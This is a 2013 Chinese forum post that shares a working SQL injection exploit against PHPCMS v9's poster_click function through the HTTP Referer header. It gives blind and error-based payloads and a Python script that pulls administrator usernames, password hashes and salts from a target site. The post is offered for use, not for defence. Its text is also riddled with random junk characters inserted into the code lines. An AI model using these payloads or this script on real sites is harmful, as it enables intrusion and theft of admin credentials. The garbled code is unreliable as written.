有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
% K; I8 _! g" [0 G5 X0 V4 q( W0 }, E5 Y' J! R5 T) `. R& j8 K2 \( E
问题函数\phpcms\modules\poster\index.php
# ~1 ?$ F9 @8 V8 P& r6 M. v( `4 Y! j" p8 i( z7 A7 _- ^
public function poster_click() {
9 _& l0 M: H' |$id = isset($_GET['id']) ? intval($_GET['id']) : 0;: A4 ~* ~. m9 o5 L+ `$ O8 @, C
$r = $this->db->get_one(array('id'=>$id));
! _* [. p/ W& l# u* M8 c1 eif (!is_array($r) && empty($r)) return false;
% A# h& U+ P2 \2 z% x$ip_area = pc_base::load_sys_class('ip_area');) u% B$ x" e" G1 c% D0 x) C0 Q
$ip = ip();( T& Q }4 b& X+ {
$area = $ip_area->get($ip);
6 J; i5 \# a& O- T; @1 ?$username = param::get_cookie('username') ? param::get_cookie('username') : '';9 M4 b9 ^/ J f- p; I
if($id) {
# a+ R( G' Z. y; v# \; b! C' h0 v. ^2 H$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();/ Z2 O5 y$ Q* P4 s8 {1 v" D6 g1 j; G s
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
( {) C! X8 O/ n+ U" e1 j2 N; ~}0 i+ U0 L& P/ J/ ^$ L t5 V* V
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
; R% @( I4 b! C! }8 ]; b$setting = string2array($r['setting']);! K o' `2 Q4 d2 H, H$ Z; I
if (count($setting)==1) {) ^, P9 c4 y2 l" t' b
$url = $setting['1']['linkurl'];- w4 l3 h1 @4 C% C
} else {
/ D3 h* c6 w3 {& t- {$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];! o$ o1 V1 U1 i% }1 a1 ~; c7 k7 I
}
- ~8 V# T9 K$ z# |/ {2 {) Uheader('Location: '.$url);
0 A; k5 z" F% t( h4 r" }4 X7 c}
# ^9 n5 u6 u- j
5 r9 \2 y; b7 P0 [
$ A3 v" E' J$ H0 A9 a8 L Z" C* P" m+ h, d1 l! ~% g/ ^3 u
利用方式:
% Q3 k5 k' y% `+ L& V! F* @' w; \+ g/ c9 N# w
1、可以采用盲注入的手法:* K. W: K, H2 m4 s2 s' N4 q8 I
# ^% D, Z5 Y6 x
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
7 T3 T% B% Y- d
- x! w9 ?' P- _3 g( E通过返回页面,正常与否一个个猜解密码字段。1 M: ]- l( R2 |" H
& t) K- z# [/ t/ _8 s1 p/ f
2、代码是花开写的,随手附上了:" F- r; R, [& _" t5 w6 v( d0 I) f
! G$ P! a& m P2 g
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
. U4 W: G. O! Y4 q& g( v9 G4 @1 R! Q. x w
此方法是爆错注入手法,原理自查。
$ \0 O; v- ~+ f1 W
2 _" l. L8 x" w* w$ l' p% R5 w. H
& F: x/ ^# k3 |
$ v1 ?& I! m( s1 X, [% K利用程序:, a* I/ [3 T6 u
5 h3 {% T4 l: c, V! y$ ?
#!/usr/bin/env python
$ e" @; A. S- L# p7 s( _- dimport httplib,sys,re
/ d6 `" s1 Q2 v: W9 H- O/ x- @& E
def attack():+ N3 k; t% X& R5 x# i
print “Code by Pax.Mac Team conqu3r!”
- K Z& N' [" o! p/ t, e% Z* R% aprint “Welcome to our zone!!!”3 H( t. R: B4 d J+ `7 @
url=sys.argv[1]% d1 \7 E3 m5 k; E! N+ ?
paths=sys.argv[2]- h$ ]- i& M0 V1 C( z
conn = httplib.HTTPConnection(url)
4 Z. }8 W0 p- w: Q6 t C3 D% r! bi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,( p. [ k& G: b# p: ` p
“Accept”: “text/plain”,& I$ |, n' ~$ r: _
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
5 k; ]* R$ ~2 a8 U* t7 [8 Bconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
5 H6 R n+ Q- M+ k6 er1 = conn.getresponse()
, G' y) Y7 K$ W2 c( O( O9 }7 ?datas=r1.read()
( h$ t- }5 p7 v, _datas=re.findall(r”Duplicate entry \’\w+’”, datas)
4 s/ ?+ t+ |" G" hprint datas[0]- O- j5 k- S; T0 P
conn.close()# H; \+ |- u, _
if __name__==”__main__”:* M7 t. k* V8 N4 f2 |& ~5 `$ T
if len(sys.argv)<3:: L: N" B n2 N! \4 S4 W2 s8 I: s
print “Code by Pax.Mac Team conqu3r”+ x) t* x5 D/ u) \# V: Y
print “Usgae:”& x7 O2 G8 [8 }% g m5 a- K" c4 w
print “ phpcmsattack.py www.paxmac.org /”
; U9 y5 m2 O. @ f- p0 Vprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
B! |& |/ \ bsys.exit(1)
' H. W" o3 S# u/ nattack()% S s G" Y9 ]: M! C
/ g3 w+ k- b; y
|
发表于 2013-1-11 21:01:00
收藏
支持
反对